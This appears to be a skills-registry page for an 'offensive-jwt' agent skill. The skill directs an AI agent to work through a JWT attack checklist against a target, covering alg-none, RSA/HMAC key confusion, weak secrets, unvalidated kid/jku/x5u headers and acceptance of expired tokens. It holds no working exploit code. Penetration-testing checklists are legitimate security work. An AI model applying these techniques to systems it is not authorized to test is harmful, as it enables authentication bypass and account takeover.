Skills

offensive-jwt

Installation
SKILL.md

Overview

Comprehensive JWT attack checklist for offensive security engagements. Follow steps in order; apply each technique to the current target context and track which items have been completed.

Quick Reference: Misconfigurations to Check

  • Algorithm set to none — signature verification bypassed entirely
  • Algorithm switching between RSA and HMAC (confusion attack)
  • Weak or guessable HMAC secret (brute-forceable)
  • kid, jku, jwk, x5u header parameters accepted without validation
  • Expired or tampered tokens accepted by server
  • Sensitive data stored unencrypted in payload

Useful tool: JWT Tool

Mechanisms

JWTs (RFC 7519) consist of three Base64URL-encoded parts: header.payload.signature.

Installs
33
Repository
snailsploit/claude-red
GitHub Stars
2.3K
First Seen
May 3, 2026
Security Audits
Gen Agent Trust HubPass
SocketWarn
SnykFail
offensive-jwt — snailsploit/claude-red